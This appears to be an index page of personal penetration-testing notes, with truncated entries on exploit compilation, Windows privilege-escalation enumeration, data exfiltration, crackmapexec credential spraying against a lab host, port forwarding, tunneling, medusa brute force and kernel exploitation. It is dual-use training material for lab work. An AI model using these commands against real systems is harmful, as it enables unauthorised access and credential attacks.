Shuciran Pentesting Notes

GCC Compilation

Basic Compilation gcc -o exploit exploit.c 32-Bit Compilation gcc -m32 -Wl,--hash-style=both -o exploit exploit.c

Automated Enumeration (Windows)

WinPeas On Windows, one automated script is WinPeas Windows-Privesc-Check Another automated script is windows-privesc-check, which can be found in the windows-privesc-check We’ll specify the self...

Uploads Using Windows Scripting Languages

In certain scenarios, we may need to exfiltrate data from a target network using a Windows client. This can be complex since standard TFTP, FTP, and HTTP servers are rarely enabled on Windows by de...

Crackmapexec

SMB crackmapexec smb 10.10.11.158 -u users -p creds Example: [[StreamIO#^11d8df]] LDAP crackmapexec ldap 10.10.11.158 -u users -p creds --continue-on-success [[StreamIO#^676765]] WINRM crackmap...

Plink

During the enumeration and information gathering process, we discover a MySQL service running on TCP port 3306. C:\Windows\system32>netstat -anpb TCP netstat -anpb TCP Active Connections P...

NETSH

For this to work, the Windows system must have the IP Helper service running and IPv6 support must be enabled for the interface we want to use. Fortunately, both are on and enabled by default on Wi...

HTTP Tunneling Through Deep Packet Inspection

Our goal is to initiate a remote desktop connection from our Kali Linux machine to the Windows Server 2016 through the compromised Linux server using only the HTTP protocol. We will rely on HTTPTu...

Network Service Attack Methods

HTTP htaccess Attack with Medusa We will attempt to gain access to an htaccess-protected folder, /admin, on that server. Next, we will launch medusa and initiate the attack against the htaccess-p...

Rinetd

We will use a port forwarding tool called rinetd to redirect traffic on our Kali Linux server. This tool is easy to configure, available in the Kali Linux repositories, and is easily installed with...

Kernel Vulnerabilities via Drivers

When attempting to exploit system-level software (such as drivers or the kernel itself), we must pay careful attention to several factors including the target’s operating system, version, and archi...